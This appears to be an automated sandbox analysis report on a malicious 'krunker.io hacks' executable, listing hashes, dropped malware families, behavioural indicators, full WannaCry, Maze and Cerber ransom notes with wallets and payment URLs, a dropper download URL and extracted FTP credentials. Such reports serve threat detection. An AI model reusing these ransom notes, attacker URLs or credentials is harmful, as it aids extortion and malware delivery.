amadey | 892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

max time kernel
1800s
max time network
1809s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09-04-2024 17:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

krunker.iohacks.exe
Size

30.9MB
MD5

2850f1cb75953d9e0232344f6a13bf48
SHA1

141ab8929fbe01031ab1e559d880440ae931cc16
SHA256

892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
SHA512

25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
SSDEEP

786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe

Extracted

Credentials

Protocol: ftp
Host:
files.000webhost.com
Port:
21
Username:
fcb-aws-host-4

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Extracted

Path

C:\odt\DECRYPT-FILES.txt

Family

maze

Ransom Note

Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6b770cb59915d8c1 e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6b770cb59915d8c1 b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- pHjQ6f+gHEKLc/fZLe+8FceodMf28MUkGF34OG3zebRhDvLs4WprYNXfyfZDMHTCtCCF6BaJtW5FIEwTAVivCPe2FPWFkt9kldDIAudWHZ6C4nSFJnuYhLtoKyxZMa8iEsbnPr8W0AI9/+ZpquucuswimEHg3sN1hJndYwV9Vjjf8v2HOMa/6b6Q1joPMST3pGsm1zDwh8VK80GT9xMd6i3AUu4FnuStpCQGjiNHP5SjgodHiTOvXasAMWYNlrlsg1w2E7wzBB3Qb5kgpfzmbsV6ahgYA9EwnrqkfQA708lkCnu6EFRln6iJM9moxBf/cqK9tvdvigzksj44BB5KU/OjeFe67thBnaOHr+JNSan0Oz14s+OCvnu7BLTTXxwp53pka8ZbCRfHfUttmgucaj/twTetummdLeZLoXQjE4+WsFFUNuhBS5phxMsiWjLbkUe84O1K2e0778OCmeBzb6dHBz7p8zycKsf/20FJ/j/sGbDifrKZ46puHMErt/LgE8esqZXz0GHrAT9g11grf76ANVveXHvA8LgLL5j/lQUH2hGnEKQQjw7R84i5vgquGST4rKss7ZEVN7M+Vxs4XfrLja0/CVYjh0JFZe9+g2KJVKXiQTHcNXos8yaPAVVaLEUUElUAPpWoGvQMp3KSu5KfcMSpZCRe8owp5jMvWzKjeEd94DYPgLf9pBss4rAOdjbxcyzJUJQ30mQPxC1VFMXYefuLqdzHe9m+LEd+ADxLh699/JCsoN0eaG3d+rQ0j74xLlvDSMS6vSAh60X86CWKbaVBbZd00PQpeUtuRS7ZlUGGAjZe2+EDpTI+o1CBqFyyBLzNMc86VSf+AtF5fl1P5rOwe+CrXlq1TvfG7ZFU1BlcqrSzWP1eMeTzWF7adUCxqnh3Ry9EIoPjpuAu3w7B0CL/HqPjhQg0xn4JJvq57j+z9C4Uk4ma8z+O0KJtW3XhN2dNtdg9tMUx12yHulH2y2awgeWYnDhhz/KR5WCTLLZRcADKrKD+QTgEuPa9JHRAiEr6dtOY2nK/dscq2+yAk75Pu5nTL/LEXW4f7F4UV+O7UP6CLI5rF90Naogu21cvh4Dd7cWd7a+EAiGEfjvqllfFNo9g9UiLriVkVeYebpOvlcFafLv8lfojBgsQJffEIuTIn8cBdF+uTgO0vc/WANCN9GJxKB0XZweODgI6JusqGSwe/itw5C8o+A+X4hBV9ObSGTIotJakdiRRm7GEKcSBgqBeMoQy/flKUmgzYyVu4CAGHejENMQpucsdiCGZef4bvlQoMLtLBLEXAlHJAUAcRHkrYIh9z9cBI6cDjAFm/OkFtvQ7jpoSmZM0Xk+6+ATcF1EhK+8jzHVeeDAXvdyh47ZspxQCidmFnSQ9dKLb/aoGGEDHqPZFsAoSDQmRPXebzBv7rOeaGfeWolZ0L0duHYzLF3TQ7DniSzAsk8HF/Q7kcbDwbdEtDujl8rzf56kJZzBZawPMHWfdCWocsHH9z2uldwtyjlWBQ94KAzZKmUDiDIK1oXYlOQGKKBl3iQ5wLm2535dO6+QGAwaTEmDSQ2txr/Onxj3juj8kpKlZ8RVr314n9CY+h+oI/nQ35l255Ccg3+gEbIwiK4rbmcRvmUB/ujUohHzuYnLBYYvm1488W+stLMnI7MPs8B0BZPBYNi0LD9/IHUrpdxWRpuIrLtQyxx4B03pAJAt2TBk5LKGkpezw/2QaPntJvBphMQXewjNs2X/BC6/FtagKluVGl6/s2nZw/JbDINHNmwHOqGI8gmy+zJKVrdD9Tz9y8VFILze0avdXJZFjXVO7iJ9/OYBnAOEkh+DFWFjNic0sMl21W5i+xjRF2DN8v88Si9JEwDho7sVo3iy4o8aQfrcFNNRSIBz+UiHwLZ+Ljg1cY9IufuvGRiKXo41iTsNF6k5bAa7w+HKeGok5JdHfkR4wSGce7HzIuxR1T6g4gGcAwSwup525rYFJW4Tjv5At95o2EreYVCIZp81qIFD38hxjI8TtNtdvkd2aXohWnc3dfzF4PKGovgjZmIKkRBQwzfQ9sFoVC9Wtb/zADpMjo3LXv2KpTaHC3f/MY10q5AeSTekYWNuyXG28fzxWGqyqK6VvvQAmKH3ifs55CZZ0RWCq+ELcFqXb2MSq8QAANom37IOfc4J7kKPacM+8bUG+pp7055CxB2fM53nARxAd7skGlljlKocnMWJSpS/gxUl1138G3FdLzj8yQWCTaUR8KQoiNgBiADcANwAwAGMAYgA1ADkAOQAxADUAZAA4AGMAMQAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAE8AQQBJAEwAVgBDAE4AWQAAACoMbgBvAG4AZQB8AAAAMixXAGkAbgBkAG8AdwBzACAAMQAwACAARQBuAHQAZQByAHAAcgBpAHMAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEJWfABDAF8ARgBfADIAMAA0ADQANQAvADIANAAxADMANgAxAHwARABfAFUAXwAwAC8AMAB8AEYAXwBGAF8AMgAwADQAMgAxAC8AMgAwADQANwA5AHwAAABIAFBAWIkIYIkIaIkIcOv04XJ4DIABAYoBBTIuMy4x ---END MAZE KEY---

URLs

http://aoacugmutagkwctu.onion/6b770cb59915d8c1

https://mazedecrypt.top/6b770cb59915d8c1

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\_R_E_A_D___T_H_I_S___0DMLQMZ_.txt

Family

cerber

Ransom Note

Hi, I'am CRBR ENCRYPTOR ;) ----- ALL YOUR DOCUMENTS, PH0T0S, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only one way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_R_E_A_D___T_H_I_S_*) with complete instructions how to decrypt your files. If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://xpcx6erilkjced3j.onion/3550-81E6-620D-0098-BA27 Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://xpcx6erilkjced3j.1n5mod.top/3550-81E6-620D-0098-BA27 2. http://xpcx6erilkjced3j.19kdeh.top/3550-81E6-620D-0098-BA27 3. http://xpcx6erilkjced3j.1mpsnr.top/3550-81E6-620D-0098-BA27 4. http://xpcx6erilkjced3j.18ey8e.top/3550-81E6-620D-0098-BA27 5. http://xpcx6erilkjced3j.17gcun.top/3550-81E6-620D-0098-BA27 ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----

URLs

http://xpcx6erilkjced3j.onion/3550-81E6-620D-0098-BA27

http://xpcx6erilkjced3j.1n5mod.top/3550-81E6-620D-0098-BA27

http://xpcx6erilkjced3j.19kdeh.top/3550-81E6-620D-0098-BA27

http://xpcx6erilkjced3j.1mpsnr.top/3550-81E6-620D-0098-BA27

http://xpcx6erilkjced3j.18ey8e.top/3550-81E6-620D-0098-BA27

http://xpcx6erilkjced3j.17gcun.top/3550-81E6-620D-0098-BA27

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
ransomware cerber
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Neshta payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe	family_neshta
C:\odt\OFFICE~1.EXE	family_neshta
behavioral1/memory/3672-298-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/3672-429-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\XClient.exe	family_xworm

Detect ZGRat V1 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\M5traider.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swizzyyyy.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12341.exe	family_zgrat_v1

Maze
Ransomware family also known as ChaCha.
trojan ransomware maze
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Process spawned unexpected child process 8 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1968	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5832	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6956	4964	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6468	4964	schtasks.exe

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe	family_asyncrat

Contacts a large (2600) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/6072-427-0x0000000000930000-0x00000000009C4000-memory.dmp	dcrat
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApi.ProxyStub\SearchApp.exe	dcrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/6712-1478-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/1604-2389-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView

Nirsoft 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6712-1478-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/1604-2389-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

412 netsh.exe
5132 netsh.exe
4848 netsh.exe

pid	process
412	netsh.exe
5132	netsh.exe
4848	netsh.exe

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\2.doc	office_macro_on_action

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

krunker.iohacks.exebot.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	krunker.iohacks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	bot.exe

Executes dropped EXE 11 IoCs

Processes:

4363463463464363463463463.exebot.exe[email protected][email protected][email protected]RIP_YOUR_PC_LOL.exeska2pwej.aeh.exe1.exeska2pwej.aeh.tmpbot.exetaskdl.exe

pid	process
2912	4363463463464363463463463.exe
3672	bot.exe
984	[email protected]
1844	[email protected]
1492	[email protected]
4460	RIP_YOUR_PC_LOL.exe
4388	ska2pwej.aeh.exe
556	1.exe
4940	ska2pwej.aeh.tmp
2132	bot.exe
1540	taskdl.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exe

pid process

3176 icacls.exe
5780 icacls.exe
Modifies system executable filetype association 2 TTPs 1 IoCs
persistence

Modify Registry
T1112

Change Default File Association
T1546.001

Processes:

bot.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" bot.exe

pid	process
3176	icacls.exe
5780	icacls.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1844-98-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1844-106-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1844-201-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1844-206-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1844-213-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1844-300-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1844-434-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Tempspwak.exe	upx
behavioral1/memory/3644-1036-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral1/memory/1844-1056-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/1076-1050-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/5776-1048-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral1/memory/4120-1047-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/1324-1151-0x0000000000400000-0x0000000000416000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

[email protected]

description	ioc	process
File opened (read-only)	\??\h:	[email protected]
File opened (read-only)	\??\o:	[email protected]
File opened (read-only)	\??\t:	[email protected]
File opened (read-only)	\??\z:	[email protected]
File opened (read-only)	\??\b:	[email protected]
File opened (read-only)	\??\g:	[email protected]
File opened (read-only)	\??\i:	[email protected]
File opened (read-only)	\??\k:	[email protected]
File opened (read-only)	\??\m:	[email protected]
File opened (read-only)	\??\p:	[email protected]
File opened (read-only)	\??\q:	[email protected]
File opened (read-only)	\??\r:	[email protected]
File opened (read-only)	\??\e:	[email protected]
File opened (read-only)	\??\w:	[email protected]
File opened (read-only)	\??\l:	[email protected]
File opened (read-only)	\??\n:	[email protected]
File opened (read-only)	\??\s:	[email protected]
File opened (read-only)	\??\u:	[email protected]
File opened (read-only)	\??\v:	[email protected]
File opened (read-only)	\??\a:	[email protected]
File opened (read-only)	\??\x:	[email protected]
File opened (read-only)	\??\y:	[email protected]
File opened (read-only)	\??\j:	[email protected]

Legitimate hosting services abused for malware hosting/C2 1 TTPs 57 IoCs

Web Service

T1102

Processes:

flow	ioc
1837	raw.githubusercontent.com
1873	raw.githubusercontent.com
1932	raw.githubusercontent.com
408	pastebin.com
1833	raw.githubusercontent.com
1854	pastebin.com
2135	pastebin.com
3256	pastebin.com
3281	pastebin.com
4463	raw.githubusercontent.com
16	iplogger.org
1931	raw.githubusercontent.com
376	raw.githubusercontent.com
1923	raw.githubusercontent.com
6736	raw.githubusercontent.com
405	pastebin.com
20	iplogger.org
1702	bitbucket.org
1826	raw.githubusercontent.com
2903	pastebin.com
384	bitbucket.org
1831	raw.githubusercontent.com
4806	pastebin.com
2133	pastebin.com
1824	raw.githubusercontent.com
1997	raw.githubusercontent.com
6465	raw.githubusercontent.com
6652	raw.githubusercontent.com
1822	raw.githubusercontent.com
1621	bitbucket.org
1821	raw.githubusercontent.com
1874	raw.githubusercontent.com
1898	pastebin.com
6690	raw.githubusercontent.com
17	iplogger.org
1622	bitbucket.org
1703	bitbucket.org
1766	raw.githubusercontent.com
1827	raw.githubusercontent.com
1979	raw.githubusercontent.com
1871	raw.githubusercontent.com
2012	raw.githubusercontent.com
2239	raw.githubusercontent.com
2429	pastebin.com
6503	raw.githubusercontent.com
1817	raw.githubusercontent.com
1872	raw.githubusercontent.com
1990	raw.githubusercontent.com
5379	pastebin.com
383	bitbucket.org
1891	raw.githubusercontent.com
6575	raw.githubusercontent.com
24	iplogger.org
1815	raw.githubusercontent.com
1900	pastebin.com
1930	raw.githubusercontent.com
2200	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1728 ip-api.com
1818 ip-api.com
1823 whoer.net
1825 whoer.net
Drops file in Windows directory 1 IoCs

Processes:

bot.exe

description ioc process

File opened for modification C:\Windows\svchost.com bot.exe

flow	ioc
1728	ip-api.com
1818	ip-api.com
1823	whoer.net
1825	whoer.net

description	ioc	process
File opened for modification	C:\Windows\svchost.com	bot.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\User%20OOBE%20Broker.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 51 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1560	5304	WerFault.exe	ISetup8.exe
6664	4480	WerFault.exe	funta.exe
6060	5220	WerFault.exe	fud.exe
8104	6840	WerFault.exe	23.exe
7244	5220	WerFault.exe	fud.exe
8124	5220	WerFault.exe	fud.exe
6332	7792	WerFault.exe	6KADDB~1.EXE
7244	5488	WerFault.exe	syncUpd.exe
2592	5220	WerFault.exe	fud.exe
6532	1264	WerFault.exe	U60G0~1.EXE
5432	5220	WerFault.exe	fud.exe
7960	5220	WerFault.exe	fud.exe
6844	5460	WerFault.exe	U43C0~1.EXE
7472	5220	WerFault.exe	fud.exe
5476	5220	WerFault.exe	fud.exe
4652	7624	WerFault.exe	SVCSER~1.EXE
5540	5220	WerFault.exe	fud.exe
2572	4480	WerFault.exe	funta.exe
4400	5220	WerFault.exe	fud.exe
3720	4576	WerFault.exe	Dctooux.exe
7612	7564	WerFault.exe	Dctooux.exe
7716	7564	WerFault.exe	Dctooux.exe
4380	7668	WerFault.exe	SVCSER~1.EXE
5584	2316	WerFault.exe	RegAsm.exe
5820	7564	WerFault.exe	Dctooux.exe
6520	7564	WerFault.exe	Dctooux.exe
4748	7564	WerFault.exe	Dctooux.exe
2520	7564	WerFault.exe	Dctooux.exe
5816	7564	WerFault.exe	Dctooux.exe
7220	4340	WerFault.exe	ISetup3.exe
3372	3532	WerFault.exe	ISetup1.exe
3928	7564	WerFault.exe	Dctooux.exe
3200	7896	WerFault.exe	U3CK0~1.EXE
5956	7564	WerFault.exe	Dctooux.exe
7032	7564	WerFault.exe	Dctooux.exe
6556	4740	WerFault.exe	U2Q40~1.EXE
6560	7564	WerFault.exe	Dctooux.exe
1064	7120	WerFault.exe	4XRVXP~1.EXE
6552	7564	WerFault.exe	Dctooux.exe
3636	7484	WerFault.exe	U5HS0~1.EXE
1912	7564	WerFault.exe	Dctooux.exe
7712	7564	WerFault.exe	Dctooux.exe
968	7564	WerFault.exe	Dctooux.exe
1592	7564	WerFault.exe	Dctooux.exe
6396	3028	WerFault.exe	SVCSER~1.EXE
6824	7564	WerFault.exe	Dctooux.exe
2460	5136	WerFault.exe	7AO4EM~1.EXE
2728	5136	WerFault.exe	7AO4EM~1.EXE
8156	2848	WerFault.exe	timeSync.exe
7504	6664	WerFault.exe	SVCSER~1.EXE
1696	7564	WerFault.exe	Dctooux.exe

Creates scheduled task(s) 1 TTPs 22 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
6956	schtasks.exe
6468	schtasks.exe
4656	schtasks.exe
5292	schtasks.exe
5832	schtasks.exe
5012	schtasks.exe
1520	schtasks.exe
8040	schtasks.exe
2528	schtasks.exe
4960	schtasks.exe
2292	schtasks.exe
4816	schtasks.exe
4340	schtasks.exe
2448	schtasks.exe
5212	schtasks.exe
3736	schtasks.exe
1968	schtasks.exe
2492	schtasks.exe
6932	schtasks.exe
2272	schtasks.exe
4280	schtasks.exe
1480	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6016 timeout.exe
2076 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5064 taskkill.exe
Modifies registry class 1 IoCs

Processes:

bot.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" bot.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

7652 NOTEPAD.EXE
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2140 PING.EXE
4588 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
6016	timeout.exe
2076	timeout.exe

pid	process
5064	taskkill.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

pid	process
7652	NOTEPAD.EXE

pid	process
2140	PING.EXE
4588	PING.EXE

description	flow	ioc
HTTP User-Agent header	14	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

krunker.iohacks.execmd.exe[email protected]RIP_YOUR_PC_LOL.exeska2pwej.aeh.exebot.exe1.exe

description	pid	process	target process
PID 4016 wrote to memory of 3820	4016	krunker.iohacks.exe	cmd.exe
PID 4016 wrote to memory of 3820	4016	krunker.iohacks.exe	cmd.exe
PID 4016 wrote to memory of 3820	4016	krunker.iohacks.exe	cmd.exe
PID 3820 wrote to memory of 2912	3820	cmd.exe	4363463463464363463463463.exe
PID 3820 wrote to memory of 2912	3820	cmd.exe	4363463463464363463463463.exe
PID 3820 wrote to memory of 2912	3820	cmd.exe	4363463463464363463463463.exe
PID 3820 wrote to memory of 3672	3820	cmd.exe	bot.exe
PID 3820 wrote to memory of 3672	3820	cmd.exe	bot.exe
PID 3820 wrote to memory of 3672	3820	cmd.exe	bot.exe
PID 3820 wrote to memory of 984	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 984	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 984	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 1844	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 1844	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 1844	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 1492	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 1492	3820	cmd.exe	[email protected]
PID 3820 wrote to memory of 1492	3820	cmd.exe	[email protected]
